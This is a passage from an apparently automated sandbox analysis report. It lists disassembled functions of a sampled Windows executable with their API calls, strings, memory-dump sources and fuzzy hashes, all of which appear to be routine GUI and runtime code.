                                                                                                                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                                    Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a303ae421967ed805ccaf407991e05be4a725e9efa943f69ad4090a8a0f3d8d3
                                                                                                                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                                    • Opcode Fuzzy Hash: a303ae421967ed805ccaf407991e05be4a725e9efa943f69ad4090a8a0f3d8d3
                                                                                                                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                                    Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2353593579-4108050209
                                                                                                                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                    Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1744303182-0
                                                                                                                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                    Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                    • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                    • API String ID: 4163708885-3819984048
                                                                                                                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                                    Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll$IconLoad
                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                    • API String ID: 2485277191-404129466
                                                                                                                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                    Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3869813825-0
                                                                                                                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                                    Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                                    • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                                    • String ID: D
                                                                                                                                                    • API String ID: 1914653954-2746444292
                                                                                                                                                    • Opcode ID: ed9d0a7f9b7fb7092718205c5f8494621a67a2dc2e8c2e1649d5905c8fe18f22
                                                                                                                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                                    • Opcode Fuzzy Hash: ed9d0a7f9b7fb7092718205c5f8494621a67a2dc2e8c2e1649d5905c8fe18f22
                                                                                                                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                                    Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll
                                                                                                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                    • API String ID: 3832890014-4202584635
                                                                                                                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                                    Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                    • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$CtrlFocus
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1534620443-4108050209
                                                                                                                                                    • Opcode ID: 7c6c4d24ceb8cecb3d8bafd3d66fcf6c17dfe0bcf56ceba48e1820ad1c1361f1
                                                                                                                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                    • Opcode Fuzzy Hash: 7c6c4d24ceb8cecb3d8bafd3d66fcf6c17dfe0bcf56ceba48e1820ad1c1361f1
                                                                                                                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                    Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateDestroy
                                                                                                                                                    • String ID: ,$tooltips_class32
                                                                                                                                                    • API String ID: 1109047481-3856767331
                                                                                                                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                    Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1441871840-4108050209
                                                                                                                                                    • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
